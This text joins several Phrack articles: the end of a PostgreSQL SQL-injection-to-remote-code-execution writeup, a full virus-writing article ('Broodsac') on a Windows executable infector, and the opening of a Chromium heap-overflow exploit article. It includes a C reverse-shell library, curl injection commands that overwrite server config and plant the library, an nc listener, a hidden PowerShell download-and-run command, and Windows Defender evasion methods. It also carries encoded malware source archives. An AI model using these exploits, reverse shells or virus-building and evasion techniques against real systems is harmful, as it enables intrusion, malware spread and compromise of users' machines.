sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}
--------------------------------------------------------------------------
Notice the presence of the "PG_MODULE_MAGIC" field in the code. It is
required for the library to be recognized and loaded by the PostgreSQL
server.
Before compilation, we must install proper PostgreSQL development packages
for the correct major version, 13 in our case:
--------------------------------------------------------------------------
$ sudo apt install postgresql-13 postgresql-server-dev-13 -y
--------------------------------------------------------------------------
The code can be compiled with gcc with the following command:
--------------------------------------------------------------------------
$ gcc \
-I$(pg_config --includedir-server) \
-shared \
-fPIC \
-nostartfiles \
-o payload.so \
payload.c
--------------------------------------------------------------------------
---[ 4.3 - Uploading the config and library to the server
With the updated config file and compiled library on our hands, it is time
to upload and overwrite everything on the target DBMS host.
Uploading and replacing the postgresql.conf file:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(3331333337, decode('$(base64 -w 0 postgresql_new.conf)', 'base64'))) AS text)"
[
{"id":1337,"text":"3331333337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(3331333337, '/etc/postgresql/13/main/postgresql.conf')) AS text)"
[{"id":1337,"text":"1"}]
--------------------------------------------------------------------------
Uploading the malicious .so file:
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_from_bytea(33313333337, decode('$(base64 -w 0 payload.so)', 'base64'))) AS text)"
[
{"id":1337,"text":"33313333337"}
]
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337,CAST((SELECT lo_export(33313333337, '/tmp/payload.so')) AS text)"
[{"id":1337,"text":"1"}]
--------------------------------------------------------------------------
If everything is correct, we should see the updated config and .so file in
place:
--------------------------------------------------------------------------
# .so library
=== target server ===
ubuntu@ubuntu-virtual-machine:/tmp$ md5sum payload.so
0a240596d100c8ca8e781543884da202 payload.so
=== attacker server ===
$ md5sum payload.so
0a240596d100c8ca8e781543884da202 payload.so
# postgresql.conf
=== target server ===
ubuntu@ubuntu-virtual-machine:~$ md5sum /etc/postgresql/13/main/postgresql.conf
480bb646f178be2a9a2b609b384e20de /etc/postgresql/13/main/postgresql.conf
=== attacker server ===
$ md5sum postgresql_new.conf
480bb646f178be2a9a2b609b384e20de postgresql_new.conf
--------------------------------------------------------------------------
---[ 4.4 - Reload successful
We are all set. Now for the moment of glory! A quick config reload and we
get a reverse shell back from the server.
--------------------------------------------------------------------------
$ curl -G "http://172.23.16.127:8000/phrases" --data-urlencode \
"id=-1 UNION SELECT 1337, CAST((SELECT pg_reload_conf()) AS text)"
[
{"id":1337,"text":"true"}
]
--------------------------------------------------------------------------
On the attacker host:
--------------------------------------------------------------------------
$ nc -lvnp 8888
Listening on 0.0.0.0 8888
Connection received on 172.23.16.1 53004
id
uid=129(postgres) gid=138(postgres) groups=138(postgres),115(ssl-cert)
pwd
/var/lib/postgresql
--------------------------------------------------------------------------
--[ 5 - Conclusions
In this article, we managed to escalate the impact of a seemingly very
restricted SQL injection to a critical level by recreating DELETE and
UPDATE statements from scratch via the direct modification of the DBMS
files and data, and develop a novel technique of escalating user
permissions!
Excessive server file read/write permissions can be a powerful tool in
the wrong hands. There is still much to discover with this attack vector,
but I hope you've learned something useful today.
Cheers,
adeadfed
--[ 6 - References
[0] https://github.com/gin-gonic/gin
[1] https://github.com/jackc/pgx
[2] https://github.com/jackc/pgx/issues/1090
[3] https://github.com/postgres/postgres/blob/2346df6fc373df9c5ab944eebecf7d3036d727de/src/backend/tcop/postgres.c#L1468
[4] https://www.postgresql.org/docs/current/lo-funcs.html
[5] https://pulsesecurity.co.nz/articles/postgres-sqli
[6] https://thegrayarea.tech/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3
[7] https://www.postgresql.org/docs/9.4/functions-admin.html
[8] https://www.postgresql.org/docs/current/storage-hot.html
[9] https://www.postgresql.org/docs/current/storage-page-layout.html
[10] https://github.com/adeadfed/postgresql-filenode-editor
[11] https://postgresqlco.nf/doc/en/param/session_preload_libraries/
[12] https://www.manniwood.com/2020_12_21/read_pg_from_go.html
--[ 7 - Source code
base64 -w 75 sources.tar.gz
H4sIAAAAAAAAA+w9a3MaubL7mV+hm1QtsCEYMA/HFacK20NMLQYfwNnkel1TAwgzm2GGMzPE9u7
mv99uaTQjzcNgJ+s9dw+qVAx6dLe6pVa31BIrx/NvXOr923o9Ny1qOzP6ms5M33H3fvheqQKp1W
rg32qrUZH/ivRDtd5oNar7jVqj9kOl2mi1qj+Qxnej4IG09nzDJeSH9WRt++sH6m0o/3+aVtny7
3VPtP5IKy9n34gDBdxs1rPkX.................................
........................
..................[please see original file for source code in entirety]...........................
............................................................................
===========================================================
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x09 of 0x11
|=-----------------------------------------------------------------------=|
|=--------------------------=[ Broodsac ]=-------------------------------=|
|=-----=[ A VX Adventure in Build Systems and Oldschool Techniques ]=----=|
|=-----------------------------------------------------------------------=|
|=--------=[ Amethyst Basilisk ]=----------=|
|=-----------------------------------------------------------------------=|
--[ Table of Contents
1. Introduction
2. Planning the Virus
3. Designing the Virus
4. Building the Virus
5. Dealing with Development Hazards
5.1. The Original Design Fails
5.2. Antivirus Catches It
6. Conclusions
7. Shouts
8. References
9. Artifacts
--[ 1. Introduction
There is nothing more thrilling than a successful payload. But in the
pursuit of payloads, we are susceptible to dopamine addiction. And in
that addiction, we seek shortcuts to get our hit. Indeed, the urgence of
speed requires us to hunt these shortcuts as well. Just use bash glue.
Don't worry about code maintainability. I have the compiler, why make
things more complicated?
It is easy to forget when pursuing our dark arts-- from viral writing to
exploitation-- that in everything we do, we are creating software. And
software gets complicated. Certainly, for shellcoding, it is merely a one-
liner with NASM to create a binary blob of your creation. That's not
complicated at all. But isn't the shellcode going somewhere? C won't let
you simply merge binary blobs into your code. (Not until C23, anyway.)
And it's not always as easy as concatenating your creation onto your
executable. What if you want to encrypt the shellcode somehow? And what
if another program has to handle that shellcode? And that program might
be the payload of another program in the chain! This doesn't even begin
to consider what automation your assembly payload might require, such as
dynamic obfuscation.
Our dark arts are a mess of project management-- payload factories,
matryoshka obfuscation, a plethora of moving parts necessitating
cleverness. It is not to say our quick hacks are not worthy of their
purpose-- they are. But they are more often than not optimized for speed,
not interoperability, maintainability or portability. A good build system,
by sometimes sacrificing short-term speed of development, provides these
things.
Unix users are already familiar with this. One of the oldest build
systems, GNU Make and the autotools suite, is fundamental to sharing
and building code on Unix-like platforms. Windows users, however, don't
have this culture. Everything is Visual Studio projects. And like
everything Windows, the MSVC build system is a veritable black box
behind the Visual Studio IDE. The hackers who can wield MSVC's black
magic to their whim have undoubtedly inspired us with their mindblowingly
assembled payloads. Lord knows I would love to see SmokeLoader's build
system[10].
You can think of this article as a cooking recipe. While the virus
technique used here is nowhere near novel ("roy g biv already did it"),
it is wrapped in techniques and best practices to build any type of virus.
We will cover the use of a robust build system to construct our virus and
discuss techniques for build systems that bolster our malware development.
We will also be covering some techniques necessary to circumvent Windows
Defender, as this is now the baseline we must develop against.
To follow along, grab a copy of Visual Studio with C++ support, CMake
(https://cmake.org) and NASM for Windows (https://nasm.us). To fully
understand this article, you are expected to have a basic understanding
of PE files.
--[ 2. Planning the Virus
We want to write an executable infector for Windows. To do that, we need
to break down the moving pieces involved in an executable infector. While
traditional executable infectors have gone out of style due to advances
in executable security, it can still be done-- especially in the advent
of developers not being able to afford or care for signing their binaries.
(Hello, Rust!)
At the outset in the abstract, we have two pieces: the *infector* and
the *infection*. The *infector* is obviously responsible for infecting
executables it finds. The *infection* is simply whatever payload we want
to inject into various executables. Already, we have a dependency to work
with: naturally, the *infector* relies on the *infection* in the build
system, somehow. We want the infection to be flexible and portable so
it's as easy as possible to inject into executables. Shellcoding fits
this purpose perfectly.
For writing quality shellcode, we stick with the C-then-ASM philosophy
of writing our payload. In Broodsac, we have opted to let the compiler's
optimizer optimize our C code and hand-translated that into an assembly
file.
While this can be tedious the larger the shellcode gets, we luckily don't
have to worry about traditional requirements of shellcode as it comes to
exploitation, since we're targeting an executable, not an exploitable
buffer. Therefore, we have relatively fewer limits. Additionally, because
Windows has support for both 32-bit and 64-bit binaries, and being the
dinosaur it is, 32-bit architecture is still relevant. So payloads for
both architectures will be necessary.
At the outset of our plan, our virus hierarchy looks like this:
+ broodsac
+ infection
+ ASM
+ 32
+ 64
+ C
The infection is purely a necessity of the infector, and as such, should
be contained within its directory as a dependency. We should provide
ourselves some external ability to compile the assembly payloads into
their own binary for testing purposes. This means, in the abstract, we
have roughly four binaries to work with-- the infector, the 32-bit ASM,
the 64-bit ASM, and the C payload. Our infector should merely only rely
on the assembly payloads, so we know we should somehow connect these
pieces at the outset to our infector build.
Having the projects individually separated this way makes the moving
pieces easier to manage. Disaster, so to speak, is relatively contained
to the individual units, organized and in their place. From the outside--
especially when accustomed to a hack-fast lifestyle-- you would not be
blamed for seeing this organization as mere masturbation. Again, why
bother when I can just stick everything in the same folder and issue
compilation commands where I deem fit?
Demons lurk in your code. That's why. They will snap out and pull you
under when you least expect it, splashing red on your screen, spewing
Stoustrup's nightmare inheritance, demanding refactoring for your sinful
C. Being organized and compartmentalized in your endeavors gives you the
territorial high ground in the battle of bugs. Being prepared for
something to go wrong turns these demons into mere irritants.
Constructing a build system around your virus exposes the pain-points
when and where things go wrong, allowing you to quickly and elegantly
attend to the problem. It also acts as a functional, engineerable glue
to wrap around your build. The more complex your virus gets, the more a
solid build system becomes essential, freeing us from the chains of
uncreative compiler corporations.
--[ 3. Designing the Virus
We now have the abstract design of all the pieces of our virus. Next we
need to fill in the blanks! We have two questions we need to answer:
+ How should our virus infect the executable?
+ What should our viral payload do?
The first question was answered initially-- naively-- with code caves and
PE file entrypoint redirection. Entrypoint redirection is a technique as
old as EXE infections[1]. Unfortunately, code caves in executables aren't
frequently in a size capable of handling the beast that is Windows
shellcode. On average, you get around 200 bytes. Suitable for a Linux
shellcode, not very good for a Windows shellcode.
After some thinking, TLS directory injection[2] was settled upon. The TLS
directory-- or Thread Local Storage-- is one of many directories within a
PE file. It is responsible for ultimately managing thread memory storage
tactics within the given executable. A notable trait of the TLS directory
is initialization callbacks. There can be many, and they're iteratively
called on process startup. In other words, the TLS directory takes
precedence over the main routine, as the TLS directory initialization is
part of the PE loading process. Remember this last part-- it will bite us
in the ass later.
There is a matter of how our TLS section gets inserted into the binary.
We have simply opted to insert a new section, as we can provide a
guarantee that the section will be executable and writable, as opposed
to containing other metadata such as program resources. If we wanted to
be stealthier about the infection, we could control for executable
sections and apply the 29A technique[3] of expanding the last section
in the executable. Naturally, the trade-off for stealth here will be to
reduce potential attack surface and-- perhaps intentionally-- increasing
complexity of detecting the infection. The power is yours.
We want executable targets. Where do we find them? Surprisingly, in the
user's home directory. Gone are the days of every program installing
itself in the Program Files directory, now is the dawn of AppData and the
user's document folder where they unzip various packages of unsigned
executables. We can simply recursively iterate the user's home directory
for targets.
As for what it should do on infection? I'm a particular fan of the
Desktop Pet project[4], formerly known as eSheep in the 90s. An
appropriate payload to send up an infection technique from the 90s.
It provides a great visual if the payload executes for testing purposes.
Our payload should simply download (if the file doesn't exist) and execute
this cute little sheep onto the user's desktop. Who would oppose such
adorable software augmenting executables with a delightful animal friend?
A simple download-exec of this payload will be perfect.
--[ 4. Building the Virus
Quick and dirty, to build Broodsac, uudecode the artifacts in section 9
to get the tarball, extract it, and run the following:
$ cd broodsac
$ mkdir build
$ cd build
$ cmake ../ -A x64
$ cmake --build ./ --config Release
Naturally, I am assuming you won't be foolish enough to run the result on
a system you don't want tampered with. Unless you *want* sheep friends in
your executables, then by all means.
While you are building your virus, you are undoubtedly going to encounter
bugs. Considering we are building software, we should borrow from
software's philosophy of creating and performing tests. These do not have
to be formal unit tests, per se, where functionality is verified at
individual code points, but they should somehow test the functionality
of your virus. Considering the volatility of the undefined behavior of
targets we work with in our dark development, you should absolutely
build with tests in mind at the forefront.
There are three key questions we need to consider for our testing
purposes:
+ Does the payload work?
+ Does the infector successfully infect?
+ Does the infection succeed without disrupting original execution?
The first question has an actionable task for us: how do we test this?
Naturally, we don't have to do it programatically-- we simply need to run
the payload in its many forms to see if it successfully launches a cute
little sheep. C and Assembly have various development pitfalls that will
become apparent during this simple testing process. To build and test our
64-bit payload, for example, we can simply do this:
$ cd infection/asm/64
$ mkdir build
$ cd build
$ cmake ../ -DINFECTION_STANDALONE=ON -A x64
$ cmake --build ./ --config Release
$ ./Release/infection_asm_64.exe
If our payload succeeds, we are rewarded with a cute little sheep.
A simple test.
This is similar to the configure/make process on Linux. CMake takes the
CMakeLists.txt in the target directory and builds the configuration for
your compilation tools necessary in order to perform a build. We have
configured our ASM files to be compileable as either standalone binaries
for individual testing, or as static libraries to be included with the
infector binary.
A static library was chosen as the method of merging our payloads into our
binary because it's simple and elegant, since the payload's architecture
will match. Instinctively, we see shellcode as a unit to be stored away,
to be converted to a hex string and stashed away in some C code. So we
wind up doing creative things with it, as to us, it is merely a blob of
data to be wrangled into something. We tend to forget that the shellcode
can be its own individual code unit.
But with a build system on your side, you can augment the way your
shellcode comes out at the compilation stage. After doing various build
customizations to our shellcode payload, in our infector binary's CMake
file, we include this and the 32-bit version this way:
add_subdirectory(${PROJECT_SOURCE_DIR}/infection/asm/32)
add_subdirectory(${PROJECT_SOURCE_DIR}/infection/asm/64)
add_executable(broodsac WIN32 main.c)
target_link_libraries(broodsac infection_asm_32 infection_asm_64)
In a rather clean way, with a simple set of "extern" keywords in the
infector's main.c file, we have included our shellcode payloads into the
main binary. While not shown yet, in addition to this process, we have
managed to automate a step of encrypting the strings within the payload
code, so every time our build is executed, the strings are re-encrypted
and re-assembled in the infector executable.
We have avoided the tedium of manually converting our shellcode into an
array of some kind and even added an obfuscation step along the way.
The beauty of this method is that it avoids the unseen hazards that tend
to spring up from the speedy solutions we're used to. And at the end of
the day: it's just good software development practice.
Let's get back to our questions. The other questions, while having the
same action item, have a more complicated answer. We need to test and
analyze the infected executables to verify and debug infections. So we
need to enumerate what we need to test based on our design intent.
Because we're dealing with the TLS directory, we are dealing primarily
with *virtual addresses*, as opposed to RVA and offsets. Virtual addresses
tend to imply the need for relocations within the binary. This is
absolutely something we need to deal with as an executable infector-- with
the ubiquity of Address Space Layout Randomization (aka /DYNAMICBASE),
we would be stupid to not consider modifying the relocation directory of
a target executable in the case of infection.
Thus, we have four states of configuration to test infection against:
+ no tls directory present, no relocation directory present
+ no tls directory present, relocation directory present
+ tls directory present, no relocation directory present
+ tls directory present, relocation directory present
In addition to this, we need to consider targeting the 32-bit architecture
as well, creating a total of 8 binary configurations to test against! This
brings the total code projects in our virus project to 12. With a good
build system, we can construct all these test binaries rather easily:
$ cd infectables
$ mkdir build32 build64
$ cd build32
$ cmake ../ -A Win32
$ cd ../build64
$ cmake ../ -A x64
The build scripts can basically follow a folder hierarchy and build
multiple projects contained within, which is what's happening here.
We now have two configured build environments-- one for 32-bit and one
for 64-bit.
$ cd build32
$ cmake --build ./ --config Release
$ cd ../build64
$ cmake --build ./ --config Release
This will place all the binaries in the Release directory within the
build environment. They can then be targeted for infection by our
infector executable for testing purposes. Like the compiler at the
command line, we can configure various switches to define CMake headers.
We can configure our infector to be aware of a directory containing our
infectable executables:
$ mkdir build
$ cd build
$ cmake -DBROODSAC_DEBUG=ON -DBROODSAC_INFECTABLES="infectables" \
-A x64 ../
This command effectively builds Broodsac in debug mode. Rather than
targeting the user's home directory, it will instead target the infectable
directory, where our test programs are currently built. By running
Broodsac in this state, we can easily verify the state of infection and
its corresponding payload. And this is of utmost importance-- the demons
that hit the hardest, lurk the lowest. Robust testing will help to
eradicate them.
--[ 5. Dealing with Development Hazards
The result of the virus you see here is a labor of love, of many hours
spent debugging, testing, verifying, fixing and refactoring. But when
you see the final product, what you don't see are those little steps
along the way that ultimately built the product before you. So it's hard
to appreciate the struggle, the fight that comes with software
development. It is, for the most part, an individual journey that
everyone who writes code wanders on.
It is very easy to laugh at a good, terrible bug. It amazes us when stupid
bugs seem to have a persistent lifetime, just waiting to be discovered by
the next lucky actor. But bugs are part of the life-cycle of software,
whether exploitable or not, and as you cannot escape the gravitational
pull of software development as a virus writer, you may as well embrace
its best practices.
This section focuses on two pivotal points of critical failure in the
process of developing this virus: a point when an initial payload idea
failed at the last minute, and the point when antivirus seemed to start
detecting our infections.
--[ 5.1 The Original Design Fails
Do you remember when I said the TLS directory would come back to bite us
in the ass? How did having a robust build system help us with that?
Originally, our payload was a very simple, sensible program: import
GetFileAttributes, URLDownloadToFileA and ShellExecuteA. This would
essentially be all we needed to download our sheep and run it on the
target system. To help explain the chaos we mitigated, let's break down
the steps we need to generate and test our final payload, the infector:
1. compile the C infection
2. test the C infection
3. translate to assembly on 32-bit and 64-bit architectures
4. compile the assembly (2x)
5. test the assembly (2x)
6. incorporate the shellcode into our infector
7. compile the infector
8. test the infector
9. verify the infections succeed
When we fully enumerate the steps needed to build a sound virus, we can
appreciate the simplification a build system provides a complex ecosystem.
Because at any given step in this process, something can fail. At any
given point in the process, if there *is* failure, we will have to restart
at a certain point. The more time it takes to resume where we failed, the
more time that is wasted. And not being clear from an organizational
standpoint where you need to go to restart is a time waster. A good build
system saves you time, a very precious resource.
In this case, it was discovered that ShellExecuteA and URLDownloadToFileA
were failing all the way at step 9. Ass status: bitten. And look at when
it chose to bite us-- testing, rather than deployment. Why was it bitten?
Our infection technique of TLS injection.
Due to choosing to perform TLS injection on the binary, we were tempted by
the fact that we got precedence over the entrypoint of the infected
executable. But this means we're currently executing in the context of the
executable loader. This means our infected executable is not yet fully
loaded. In particular to our conundrum, *threads* are not yet fully
initialized. It was observed when ShellExecuteA and URLDownloadToFileA
were executed within the context of a TLS directory callback, they would
hang. It was noted, too, that the process attempted to create a thread
before it hung. This likely meant we could not use any functions which
wound up spawning threads.
The payload was changed to something slightly less conventional:
CreateProcessA. While not unconventional for our payload program, the way
we eventually went about downloading the payload certainly was.
CreateProcessA eventually calls NtCreateProcess, a function of ntdll.dll
which ultimately culminates in a kernel syscall. This would undoubtedly
be thread-safe in our TLS directory. So how did we eventually download
our payload? A call to Powershell.
Certainly goofy for a shellcode payload to make an external call to
Powershell when the API is at your fingertips, isn't it? So is the nature
of hacking-- when faced with a challenge, we heed the call with non-
standard solutions, in spite of our opinions, when it simply works.
Nonetheless, this solution required a significant rewrite of the code.
The C payload would need to be rewritten, recompiled, translated into
assembly, those assembly files compiled, and stuck back into our infector.
Essentially, we are forced to go back to the beginning of our steps
enumerated and work our way back to our infector. That's a lot of time, and
even more steps to take without the simplification provided by a build
system!
But with everything glued together, the only time we are wasting is simply
the equivalent of raking the sand in our zen garden: coding and analyzing.
All because our build system makes our complicated abstract verification
steps relatively mindless:
$ cd infection/c/build
$ cmake --build ./
$ ./Debug/infection_c.exe # any sheep? try again
$ cmake --build ./ --config Release # for translating to asm
$ cd ../../asm/32/build
$ cmake --build ./
$ ./Debug/infection_asm_32.exe # any sheep? try again
$ cd ../../64/build
$ cmake --build ./
$ ./Debug/infection_asm_64.exe # any sheep? try again
$ cd ../../../../build # footgun: are you debug configured?
$ cmake --build ./
$ ./Debug/broodsac.exe # at least you just get sheep if you footgun
Every step where something could functionally go wrong is isolated into
its own place, manageable in their own regards. Each action we need to
create our virus, from payload to delivery, is instrumented and flows
smoothly between one another. When something goes wrong at any point in
this chain, we know exactly where to restart, and can quickly act and
tackle the issue.
It's one thing to be agile when it comes to mitigating the demons of bugs,
though, but what of the demons of emergency feature requests? It is not
merely a push of management that inspires such spikes in development, but
of surprise necessity.
--[ 5.2 Antivirus Catches It
It was incredibly amusing to me when I noticed the sheep being detected as
malware. Curious, because the sheep itself was technically benign-- the
infector and the infection were actually the malware. Initially, I
whitelisted it in Windows Defender while I was working and didn't really
think anything of it, I'll fix it later. Eventually, I had to face the
music and figure out why my virus was being detected, even if the sheep
was curiously benign.
The hints we were receiving from Windows Defender was that it was some
kind of script that triggered it, and that the signature it was hitting
on was called "Trojan-Script/Wacatac.B!ml." Some research on the signature
told us absolutely nothing, as procedurally generated signatures are wont
to do. It did manage to tell us that everyone is pissed that all sorts of
random benign executables were being flagged as Wacatac. We're being taken
down by a false positive? Positively embarrassing.
Anyway, it seemed clear that with the script hint that it was triggering
on our Powershell one-liner. I didn't even bother to obfuscate the command
in any way whatsoever, so it's no wonder it got caught in the end. We
later confirmed thanks to some Windows Defender signature research[5]
that our download string was absolutely in there, somewhere, so surely
this was the culprit. This means, now, we would have to obfuscate it.
Sure, we could just do it one-and-done and hardcode it into the assembly
files, but where's the fun in that? They'll just flag the encrypted blob
and call it a day! Where's the flexibility in that? And what if I need to
change the eventual command entirely? How can I make this as painless as
possible for me and others who want to transform this code?
The beauty of a good build system is an ability to humbly offload build
commands to another process at specific points in the build. Let's look
at the code in our payloads which encrypts the strings:
add_custom_command(TARGET infection_asm_64
PRE_BUILD
COMMAND powershell ARGS
-ExecutionPolicy bypass
-File "${CMAKE_CURRENT_SOURCE_DIR}/../strings.ps1"
-payload_program "\\??\\C:\\ProgramData\\sheep.exe"
-payload_command "sheep"
-download_program "\\??\\C:\\Windows\\System32\\WindowsPowerShell\
\\v1.0\\powershell.exe"
-download_command "powershell -ExecutionPolicy bypass \
-WindowStyle hidden \
-Command \"(New-Object System.Net.WebClient).DownloadFile(\
'https://amethyst.systems/sheep.dat', 'C:\\ProgramData\\sheep.exe')\""
-output "${CMAKE_CURRENT_BINARY_DIR}/$/infection_strings.asm"
VERBATIM)
Powershell was chosen simply because it's easier to work with than the
oldschool CMD. A simple script was created which transformed the many
strings we needed to encrypt, chooses a random key, then does the
traditional xor-encrypt on the string. The script produces a NASM include
file and dumps it into the binary directory of the build system--
essentially the catch-all directory for any generated artifacts. We then
include that directory in the assembler directives so our assembly files
can see it:
target_include_directories(infection_asm_64 PUBLIC
"${CMAKE_CURRENT_SOURCE_DIR}"
"${CMAKE_CURRENT_BINARY_DIR}/$")
As creatives whose canvas is questionable machine code, we can no doubt
see the attractiveness and capability that this brings. If you're really
feeling saucy, you can even mutate COFF objects and incorporate them with
specific library configurations via CMake as well! Mucking around with
object files directly would look something like this:
add_library(obfuscateme STATIC obfu.c)
add_custom_command(TARGET obfuscateme
PRE_LINK COMMAND obfuscate ARGS
"${CMAKE_CURRENT_BINARY_DIR}/obfuscateme.dir/$/obfu.obj")
add_executable(virus main.c)
target_link_libraries(virus obfuscateme)
What these simple four lines wind up doing is compiling a set of
functionality that needs to be obfuscated, calling the obfuscator on our
compiled object file, which is then reincorporated into our build process
at the linking stage, then adding the obfuscated code as a library
dependency of the main virus. Whenever the virus target is called to be
compiled, the functionality will be obfuscated and incorporated into our
code automatically. Fundamentally, if you can call an external command to
generate anything as part of your build process, the sky's the limit with
what you can incorporate into your program.
As exciting as the implications of these particular capabilities are, our
thought to mask the signatures we thought we were hitting on was not
sufficient. See, as the Defender signature research[5] demonstrates, there
are multiple types of signatures to deal with, and according to
DefenderCheck[6] and the slightly more advanced ThreatCheck[7], I was not
hitting on static signatures. Indeed, digging into the guts of the threat
names in the defender signature database proved relatively fruitless for
hints on how to evade-- there was a static signature algorithm that wasn't
quite coherent on how it was being scanned and, more importantly, a thing
called a "NID."
A NID, in this case, appears to identify something within the Network
Realtime Inspection Service.[8] Probably some sort of metadata information
about certain behavior. This means our signatures were likely triggering
on a behavioral signature! How could we get around this?
Naively, having not run into this before, we threw random shit at the wall
to see if it worked. Hell's Gate? The Network Realtime Inspection Service
wasn't exactly an EDR, so naturally, it didn't work. Not to mention, with
Microsoft's unique position on the Windows landscape (they are the dungeon
master), attempting to evade EDR just isn't nearly deep enough. But for
the sake of completeness of potential evasions, it was left in Broodsac's
payload. (The Hell's Gate implementation consists of direct syscalls, not
indirect syscalls, so it still could use some work.)
Fundamentally, a behavioral signature relies on chaining certain actions
together to declare something as potentially nasty. Let's step through
what our payload essentially does that could get flagged as potentially
malicious:
+ download an executable
+ perhaps decrypt the executable
+ execute the executable
Frankly I see nothing wrong with this, but apparently Microsoft disagrees!
A funny quirk about behavioral analysis, though, is that it relies on
identifying the behavior of a given execution context, not the sum of its
executions. In order for behavioral analysis to succeed, the bad behaviors
which happen in combination need to happen within the same execution
context. If we split the three tasks above into three separate execution
contexts-- download, decrypt and execute-- will this be sufficient to
bypass the behavioral detection?
Yes! While I did not reverse-engineer NisSrv.exe to see the why's of why I
evaded, the theory of splitting up tasks across execution contexts
succeeded in bypassing Defender. The payload thus evolved into an
interesting multistage payload. The user would have to run the infected
executable multiple times before a sheep would appear. This would have
the added benefit of confusing stealth. Where is the sheep coming from?
Why does it keep happening when I run this program? Baffling! But
adorable. In this way, Broodsac lives up to the name of the multi-staged
worm it was named after, the green-banded broodsac.[9]
Our zen garden is tended, and ready to be shared, for others to meditate
upon and ponder for their own gardens. For that meditation, the various
code objects contained in the tarball attached to this article have been
annotated with comments to explain the individual code areas and what
they're doing. Naturally, the complexity of the dinosaur that is the PE
format comes with annoying, disgusting tricks and habits that make one
ashamed of their code in the first place. I apologize on Mark Zbikowski's
behalf.
--[ 6. Conclusions
It is without a doubt that the strange developmental anomalies you see
within wild samples of malware are the byproduct of some sort of build
system. SmokeLoader's use of encrypted functions is certainly not a
feature of the MSVC compiler[10]. But even a nasty rewrite of a C-file
being dumped into a directory for an IDE to compile, while quick and dirty
as we hackers love to do, would technically count as a build system. After
all, the Visual Studio IDE is merely a shell for the build system that is
MSVC. But as virus writers, we are still technically engineers at the end
of the day. We long for the beautiful solution to the problem.
We ultimately want our own little zen garden to tend to.
The beauty of CMake in particular is in the fact that it's cross-platform.
So if you have code-- for example, an obfuscation engine-- that is capable
of being used on multiple platforms, CMake can be used to make building
the project on each platform relatively painless. Just like how CMake
wrangles MSVC, it can also wrangle the complex build environment that is
GNU Make. Many other build targets are supported-- but some not as fully
as MSVC and GNU. Exotic targets may have some difficulty.
I hope I have made a good argument for incorporating build systems into
your payload development. While we can certainly get by with surface shell
scripts, wouldn't it be wonderful to get into the guts of the machine at
the linker level? Linux developers have that privilege, why not liberate
that access on Windows? After all, we're all effectively the demons of our
target operating systems-- we lurk at the lowest level of the machine, and
we love it here.
--[ 7. Shouts
0x6d6e647a for editing, dc949 for being family, slop pit for memes and
hardchats.
--[ 8. References
[1]: 40Hex #8: An Introduction to Nonoverwriting Virii, Part II: EXE
Infectors,
https://amethyst.systems/zines/40hex8/40HEX-8.007.txt
[2]: 29A #6: W32.Shrug, by roy g biv,
https://amethyst.systems/zines/29a6/29A-6.615.txt
[3]: 29A #2: PE infection under Win32,
https://amethyst.systems/zines/29a2/29A-2.3_1.txt
[4]: https://github.com/Adrianotiger/desktopPet
[5]: https://github.com/commial/experiments/tree/master/windows-defender
/VDM
[6]: https://github.com/matterpreter/DefenderCheck
[7]: https://github.com/rasta-mouse/ThreatCheck
[8]: https://techcommunity.microsoft.com/t5
/security-compliance-and-identity
/enhancements-to-behavior-monitoring-and-network-inspection
/ba-p/247706
[9]: https://en.wikipedia.org/wiki/Leucochloridium_paradoxum
[10]: https://www.sentinelone.com/blog
/going-deep-a-guide-to-reversing-smoke-loader-malware/,
see "Decoding the Buffer"
--[ 9. Artifacts
begin 644 broodsac.tar.gz
M'XL(`````````^P]:W?;-K+][%^!9KNI9$N.93O>['7L2H0L-A2I)2D[WC;__<[@10"D'G;<;;MK?6@L<#`8S`SF";&C.(J\Q!V_
M:ERZGVC'3])D-_VXK^UO[S>T__%3^WUT>MO:H>O_[)_N'^X
M]_KH&QC9.]C_ANP]*15+/HLD=6-"OIDOXGE`E\.M>_X'_8QG('9GYH?^;#%S
M8OJ/A1]3K_2NU1^T>UURL%M[7=[:FL?13W273A?^4]Y*:%IJ
M7-;_I^5<#MXUG/YU=]B^;#F=]EF_WO^1O+AMQK!^UFD-R(L7I%%O7+3(8-AO=P'=@*8DG5)`
M$G@T-G"1-")^.(&-5F#!X)[$-*"W;IB2.S^=$I,P('C+]3PG68P\8-DXC>+[
MTG<_7_5[_PV+.X/>=;_18L0KBYS-YV6ZF>#7N=ZV'*NZL,+4LC\;J]_6>^T_[=E3>W6A^UWJR86
M#2*.)(U!`4K]UE6GWFB1%W__^PO\#_Y3+/WO?BX:__("D0DFC:/9W`^HX]$)
..........................................
..........................................................
==========================================================
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x0A of 0x11
|=----------------------------------------------------------------------=|
|=---------------=[ Allocating new exploits ]=----------------=|
|=----------------------------------------------------------------------=|
|=-----------------=[ Pwning browsers like a kernel ]=------------------=|
|=----------=[ Digging into PartitionAlloc and Blink engine ]=----------=|
|=----------------------------------------------------------------------=|
|=----------------------------=[ r3tr074 ]=-----------------------------=|
|=---------------------------=[ r@v8.fail ]=----------------------------=|
|=----------------------------------------------------------------------=|
"He who fights with monsters might
take care lest he thereby become a
monster. And if you gaze for long
into an abyss, the abyss gazes
also into you."
- Friedrich Nietzsche
---[ Index
0 - Introduction
1 - Chromium rendering engine overview
2 - Case study: BMP 0day
2.1 - Bug power, the primitives
3 - PartitionAlloc, the memory allocator
3.1 - PartitionAlloc security guarantees
4 - Exploitation
5 - Takeaways, advances, etc etc etc
6 - References
5 - Exploit code
---[ 0 - Introduction
This article will try to explain a lot about chrome, blink and
PartitionAlloc internals and apply all this knowledge to transform an
extremely restricted bug into arbitrary code execution.
The vulnerability in question is CVE-2024-1283, a heap overflow in the
Blink engine that occurs when decoding BMP images. Using a couple of new
techniques very similar to recent Linux kernel tricks like elastic heap
